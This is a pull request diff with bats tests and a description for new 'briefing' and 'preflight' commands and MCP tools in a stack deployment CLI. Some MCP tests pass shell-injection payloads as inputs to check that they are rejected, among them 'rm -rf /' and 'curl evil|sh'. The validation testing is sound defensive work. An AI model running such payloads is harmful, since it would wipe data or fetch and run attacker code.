+  run _briefing_norm_health '' 124
+  [[ "$output" == unknown$'\t'* ]]
+}
+
+# ── drift normalizer ──────────────────────────────────────────────────────────
+
+@test "norm_drift: rc 0 -> ok" {
+  run _briefing_norm_drift 'no drift' 0
+  [[ "$output" == ok$'\t'* ]]
+}
+
+@test "norm_drift: non-zero with stdout -> critical (drift)" {
+  run _briefing_norm_drift 'docker-compose.yml differs' 1
+  [[ "$output" == critical$'\t'* ]]
+}
+
+@test "norm_drift: non-zero with empty stdout -> unknown (couldn't run)" {
+  run _briefing_norm_drift '' 1
+  [[ "$output" == unknown$'\t'* ]]
+}
+
+# ── images normalizer ─────────────────────────────────────────────────────────
+
+@test "norm_images: drifted>0 -> warn" {
+  run _briefing_norm_images '{"total":3,"drifted":1,"images":[]}' 1
+  [[ "$output" == warn$'\t'* ]]
+  [[ "$output" == *"1/3"* ]]
+}
+
+@test "norm_images: drifted 0 -> ok" {
+  run _briefing_norm_images '{"total":2,"drifted":0,"images":[]}' 0
+  [[ "$output" == ok$'\t'* ]]
+}
+
+@test "norm_images: no json -> unknown" {
+  run _briefing_norm_images 'No running containers for demo' 0
+  [[ "$output" == unknown$'\t'* ]]
+}
+
+# ── diff normalizer ───────────────────────────────────────────────────────────
+
+@test "norm_diff: no changes -> ok (false must not be read as empty)" {
+  run _briefing_norm_diff '{"has_changes":false,"has_destructive_changes":false}' 0
+  [[ "$output" == ok$'\t'* ]]
+}
+
+@test "norm_diff: pending changes -> warn" {
+  run _briefing_norm_diff '{"has_changes":true,"has_destructive_changes":false}' 1
+  [[ "$output" == warn$'\t'* ]]
+}
+
+@test "norm_diff: destructive changes -> critical" {
+  run _briefing_norm_diff '{"has_changes":true,"has_destructive_changes":true}' 1
+  [[ "$output" == critical$'\t'* ]]
+}
+
+@test "norm_diff: hard error (rc 2, no json) -> unknown" {
+  run _briefing_norm_diff '' 2
+  [[ "$output" == unknown$'\t'* ]]
+}
+
+# ── backup normalizer ─────────────────────────────────────────────────────────
+
+@test "norm_backup: strips leading log line, all healthy -> ok" {
+  run _briefing_norm_backup '✓ Dashboard data generated: /x
+[{"status":"healthy","health_score":95}]' 0
+  [[ "$output" == ok$'\t'* ]]
+}
+
+@test "norm_backup: worst engine status wins (one degraded -> critical)" {
+  run _briefing_norm_backup '[{"status":"healthy"},{"status":"degraded"}]' 0
+  [[ "$output" == critical$'\t'* ]]
+}
+
+@test "norm_backup: warning -> warn" {
+  run _briefing_norm_backup '[{"status":"warning"}]' 0
+  [[ "$output" == warn$'\t'* ]]
+}
+
+@test "norm_backup: empty array -> unknown" {
+  run _briefing_norm_backup '[]' 0
+  [[ "$output" == unknown$'\t'* ]]
+}
+
+# ── Full cmd_briefing flow ────────────────────────────────────────────────────
+
+@test "briefing: all-healthy -> posture ok, exit 0, no actions" {
+  _baseline_healthy
+  run cmd_briefing
+  [ "$status" -eq 0 ]
+  echo "$output" | jq -e '.posture == "ok"'
+  echo "$output" | jq -e '.actions | length == 0'
+  echo "$output" | jq -e '.dimensions | length == 5'
+}
+
+@test "briefing: JSON is well-formed with all documented keys" {
+  _baseline_healthy
+  run cmd_briefing
+  echo "$output" | jq -e 'has("stack") and has("env") and has("generated_at") and has("posture") and has("dimensions") and has("actions")'
+  echo "$output" | jq -e '.stack == "demo" and .env == "prod"'
+}
+
+@test "briefing: worst dimension drives posture; exit non-zero" {
+  _baseline_healthy
+  _resp drift_detect 'docker-compose.yml differs' 1   # critical
+  run cmd_briefing
+  [ "$status" -ne 0 ]
+  echo "$output" | jq -e '.posture == "critical"'
+}
+
+@test "briefing: actions are ordered worst-first with remediation commands" {
+  _baseline_healthy
+  _resp drift_detect 'differs' 1                                        # critical
+  _resp drift_images '{"total":3,"drifted":1,"images":[]}' 1            # warn
+  run cmd_briefing
+  # First action is the critical one; each carries a command.
+  echo "$output" | jq -e '.actions[0].severity == "critical"'
+  echo "$output" | jq -e '[.actions[].command | startswith("strut demo ")] | all'
+}
+
+@test "briefing: one failing check degrades to unknown, siblings still reported" {
+  _baseline_healthy
+  # diff hard-fails (rc 3, no output). It must NOT abort the whole briefing;
+  # it degrades to unknown while every sibling is still reported. Posture stays
+  # ok (unknown never dominates a real ok), so this exercises isolation, not
+  # the exit code.
+  _resp diff '' 3
+  run cmd_briefing
+  [ "$status" -eq 0 ]
+  echo "$output" | jq -e '.dimensions | length == 5'
+  echo "$output" | jq -e '.dimensions[] | select(.name=="diff") | .severity == "unknown"'
+  # A sibling that was healthy is still ok.
+  echo "$output" | jq -e '.dimensions[] | select(.name=="health") | .severity == "ok"'
+  # unknown ranks below ok, so it is not surfaced as a remediation action.
+  echo "$output" | jq -e '.actions | length == 0'
+}
+
+@test "briefing: unknown dimensions never get a remediation action" {
+  _baseline_healthy
+  _resp drift_detect '' 1                     # unknown (couldn't run)
+  _resp drift_images 'no containers' 0        # unknown (no json)
+  run cmd_briefing
+  echo "$output" | jq -e '[.actions[].dimension] | (index("drift") | not) and (index("images") | not)'
+}
+
+@test "briefing: text mode renders a posture line and per-dimension rows" {
+  _baseline_healthy
+  export CMD_JSON=""   # human output
+  run cmd_briefing
+  [[ "$output" == *"Briefing: demo (prod)"* ]]
+  [[ "$output" == *"Posture:"* ]]
+  [[ "$output" == *"health"* ]]
+  [[ "$output" == *"backups"* ]]
+}
+
+@test "briefing: --help prints usage and exits 0" {
+  run cmd_briefing --help
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"Usage: strut <stack> briefing"* ]]
+}

--- a/tests/test_mcp_tools.bats
+++ b/tests/test_mcp_tools.bats
@@ -159,3 +159,44 @@ teardown() {
   [[ "$output" == *"Unknown tool"* ]]
   [[ "$output" == *"isError"* ]]
 }
+
+# ── strut_briefing / strut_preflight: validation + pass-through ────────────────
+
+@test "_mcp_tools_call strut_briefing: rejects an injection payload in stack" {
+  run _mcp_tools_call strut_briefing '{"stack":"demo; touch /tmp/pwned #"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"isError"* ]]
+  [[ "$output" != *"CALLED:"* ]]
+}
+
+@test "_mcp_tools_call strut_briefing: rejects an injection payload in env" {
+  run _mcp_tools_call strut_briefing '{"stack":"demo","env":"prod; rm -rf /"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"isError"* ]]
+  [[ "$output" != *"CALLED:"* ]]
+}
+
+@test "_mcp_tools_call strut_briefing: a valid stack reaches strut_bin" {
+  run _mcp_tools_call strut_briefing '{"stack":"demo"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"CALLED: demo briefing --env prod --json"* ]]
+}
+
+@test "_mcp_tools_call strut_preflight: rejects an injection payload in stack" {
+  run _mcp_tools_call strut_preflight '{"stack":"demo && curl evil|sh"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"isError"* ]]
+  [[ "$output" != *"CALLED:"* ]]
+}
+
+@test "_mcp_tools_call strut_preflight: a valid stack reaches strut_bin" {
+  run _mcp_tools_call strut_preflight '{"stack":"demo"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"CALLED: demo preflight --env prod --json"* ]]
+}
+
+@test "_mcp_tools_call strut_preflight: honors a custom env" {
+  run _mcp_tools_call strut_preflight '{"stack":"demo","env":"staging"}'
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"CALLED: demo preflight --env staging --json"* ]]
+}

--- a/tests/test_preflight.bats
+++ b/tests/test_preflight.bats
@@ -1,0 +1,178 @@
+#!/usr/bin/env bats
+# ==================================================
+# tests/test_preflight.bats — lib/cmd_preflight.sh
+# ==================================================
+# Run:  bats tests/test_preflight.bats
+# Covers: the GO / CAUTION / NO-GO verdict matrix, the 0/1/2 exit-code mapping,
+# and that reasons carry a recommended command while checks echoes every
+# evaluated dimension.
+
+setup() {
+  export CLI_ROOT="$(cd "$(dirname "$BATS_TEST_FILENAME")/.." && pwd)"
+  source "$CLI_ROOT/lib/output.sh"
+  source "$CLI_ROOT/lib/utils.sh"
+  source "$CLI_ROOT/lib/briefing.sh"
+  source "$CLI_ROOT/lib/cmd_preflight.sh"
+
+  export TEST_TMP="$(mktemp -d)"
+  _make_fake_strut
+  export STRUT_HOME="$TEST_TMP"
+  export CMD_STACK=demo CMD_ENV_NAME=prod CMD_JSON=--json
+}
+
+teardown() {
+  rm -rf "$TEST_TMP"
+}
+
+_make_fake_strut() {
+  local d="$TEST_TMP"
+  cat > "$d/strut" <<EOF
+#!/usr/bin/env bash
+shift  # drop stack
+case "\$1 \${2:-}" in
+  "health"*)       key=health ;;
+  "drift detect")  key=drift_detect ;;
+  "diff"*)         key=diff ;;
+  "backup health") key=backup_health ;;
+  *)               key=unknown ;;
+esac
+[ -f "$d/\$key.out" ] && cat "$d/\$key.out"
+if [ -f "$d/\$key.rc" ]; then exit "\$(cat "$d/\$key.rc")"; fi
+exit 0
+EOF
+  chmod +x "$d/strut"
+}
+
+# _resp <key> <stdout> <rc>
+_resp() {
+  printf '%s' "$2" > "$TEST_TMP/$1.out"
+  printf '%s' "$3" > "$TEST_TMP/$1.rc"
+}
+
+# Clean, deployable baseline: healthy, in sync, pending non-destructive
+# changes, fresh backups. Individual tests override one dimension.
+_baseline_deployable() {
+  _resp health        '{"overall_status":"healthy","checks":[{"name":"Container: web","status":"pass"}]}' 0
+  _resp drift_detect  'in sync' 0
+  _resp diff          '{"has_changes":true,"has_destructive_changes":false}' 1
+  _resp backup_health '[{"status":"healthy","health_score":95}]' 0
+}
+
+# ── GO ────────────────────────────────────────────────────────────────────────
+
+@test "preflight: clean + pending changes -> GO, exit 0" {
+  _baseline_deployable
+  run cmd_preflight
+  [ "$status" -eq 0 ]
+  echo "$output" | jq -e '.verdict == "GO"'
+}
+
+@test "preflight: no pending changes is informational, still GO" {
+  _baseline_deployable
+  _resp diff '{"has_changes":false,"has_destructive_changes":false}' 0
+  run cmd_preflight
+  [ "$status" -eq 0 ]
+  echo "$output" | jq -e '.verdict == "GO"'
+  echo "$output" | jq -e '[.reasons[].message] | any(. == "No pending changes to deploy")'
+}
+
+# ── NO-GO ─────────────────────────────────────────────────────────────────────
+
+@test "preflight: config drift -> NO-GO, exit 2" {
+  _baseline_deployable
+  _resp drift_detect 'docker-compose.yml differs on VPS' 1
+  run cmd_preflight
+  [ "$status" -eq 2 ]
+  echo "$output" | jq -e '.verdict == "NO-GO"'
+  echo "$output" | jq -e '[.reasons[] | select(.severity=="critical")] | length >= 1'
+}
+
+@test "preflight: diff+drift both unavailable -> NO-GO (blind), exit 2" {
+  _baseline_deployable
+  _resp diff '' 2          # unknown (no remote target)
+  _resp drift_detect '' 1  # unknown (empty stdout)
+  run cmd_preflight
+  [ "$status" -eq 2 ]
+  echo "$output" | jq -e '.verdict == "NO-GO"'
+  echo "$output" | jq -e '[.reasons[].message] | any(startswith("Cannot assess deploy safety"))'
+}
+
+@test "preflight: drift NO-GO overrides a co-occurring caution" {
+  _baseline_deployable
+  _resp drift_detect 'differs' 1                    # NO-GO
+  _resp backup_health '[{"status":"degraded"}]' 0   # would be CAUTION alone
+  run cmd_preflight
+  [ "$status" -eq 2 ]
+  echo "$output" | jq -e '.verdict == "NO-GO"'
+}
+
+# ── CAUTION ───────────────────────────────────────────────────────────────────
+
+@test "preflight: unhealthy stack -> CAUTION, exit 1" {
+  _baseline_deployable
+  _resp health '{"overall_status":"unhealthy","checks":[]}' 2
+  run cmd_preflight
+  [ "$status" -eq 1 ]
+  echo "$output" | jq -e '.verdict == "CAUTION"'
+}
+
+@test "preflight: destructive pending changes -> CAUTION, exit 1" {
+  _baseline_deployable
+  _resp diff '{"has_changes":true,"has_destructive_changes":true}' 1
+  run cmd_preflight
+  [ "$status" -eq 1 ]
+  echo "$output" | jq -e '.verdict == "CAUTION"'
+}
+
+@test "preflight: stale/failing backups -> CAUTION, exit 1" {
+  _baseline_deployable
+  _resp backup_health '[{"status":"degraded","health_score":40}]' 0
+  run cmd_preflight
+  [ "$status" -eq 1 ]
+  echo "$output" | jq -e '.verdict == "CAUTION"'
+}
+
+@test "preflight: degraded health stays GO but is surfaced as an info reason" {
+  _baseline_deployable
+  _resp diff '{"has_changes":false,"has_destructive_changes":false}' 0  # no diff noise
+  _resp health '{"overall_status":"degraded","checks":[{"name":"Container: web","status":"pass"}]}' 1
+  run cmd_preflight
+  [ "$status" -eq 0 ]
+  echo "$output" | jq -e '.verdict == "GO"'
+  echo "$output" | jq -e '[.reasons[] | select(.severity=="info") | .message] | any(startswith("Stack is degraded"))'
+}
+
+# ── Structure ─────────────────────────────────────────────────────────────────
+
+@test "preflight: checks echoes every evaluated dimension" {
+  _baseline_deployable
+  run cmd_preflight
+  echo "$output" | jq -e '.checks | has("diff") and has("drift") and has("health") and has("backups")'
+}
+
+@test "preflight: every reason carries a recommended command" {
+  _baseline_deployable
+  _resp drift_detect 'differs' 1
+  run cmd_preflight
+  echo "$output" | jq -e '[.reasons[].command | startswith("strut demo ")] | all'
+}
+
+@test "preflight: JSON has all documented top-level keys" {
+  _baseline_deployable
+  run cmd_preflight
+  echo "$output" | jq -e 'has("stack") and has("env") and has("generated_at") and has("verdict") and has("checks") and has("reasons")'
+}
+
+@test "preflight: text mode renders verdict + checks" {
+  _baseline_deployable
+  export CMD_JSON=""
+  run cmd_preflight
+  [[ "$output" == *"Preflight: demo (prod)"* ]]
+  [[ "$output" == *"Verdict:"* ]]
+}
+
+@test "preflight: --help prints usage and exits 0" {
+  run cmd_preflight --help
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"Usage: strut <stack> preflight"* ]]
+}


### PR DESCRIPTION
## What

Two new **synthesis** commands that fuse strut's existing read-only checks into a single operational answer — exposed both as CLI commands and as read-only MCP tools (the MCP server goes **13 → 15 tools**):

- **`strut <stack> briefing`** — a one-call situation report. Aggregates health, config drift, image staleness, pending diff, and backup health into an overall **posture** (`ok`/`warn`/`critical`) plus a prioritized **actions** list, each with the exact remediation command. Exit code reflects posture.
- **`strut <stack> preflight`** — a deploy **go/no-go**. Fuses pending diff, config drift, current health, and backup freshness into a single verdict (`GO`/`CAUTION`/`NO-GO`) with reasons. Exits `0`/`1`/`2` so automation can branch on all three.

Both are surfaced over MCP as `strut_briefing` and `strut_preflight` (read-only, auto-approved).

## Why

The existing 13 MCP tools each wrap a single command. An agent asking "how's this stack?" or "is it safe to deploy?" had to call five or six tools and reconcile them itself. These two tools answer those questions in one call.

## How

- New shared `lib/briefing.sh` — error-isolated check runner + per-dimension normalizers that map each check's exit code + JSON into a common `ok`/`warn`/`critical`/`unknown` severity, plus worst-wins posture and remediation lookup.
- **No new detection logic and no new dependency** — each dimension re-invokes an existing `strut` check in its own process (a failing/hanging check degrades to `unknown` instead of aborting the aggregation), and the tool returns structured JSON for the agent to narrate.
- Wired into the entrypoint (dispatch + usage), all three shell completions, README, and the `strut` skill.

## Spec-driven

Built from `.kiro/specs/operational-briefing/` (requirements → design → tasks). `tasks.md` records the two bugs found during live testing (a jq `//`-treats-`false`-as-empty diff bug; unknown dimensions were being actioned) and the review-time transparency tightening for degraded health.

## Testing

- `tests/test_briefing.bats` (31) + `tests/test_preflight.bats` (14) + extended `tests/test_mcp_tools.bats` — normalizers, posture/verdict matrices, error isolation, JSON shape, exit codes, MCP argument-injection rejection.
- Full `bats` suite green (2,175 tests); `shellcheck` clean.
- Exercised end-to-end against a real scaffolded project (init + scaffold), confirming graceful degradation to `unknown` where no VPS/Docker is reachable.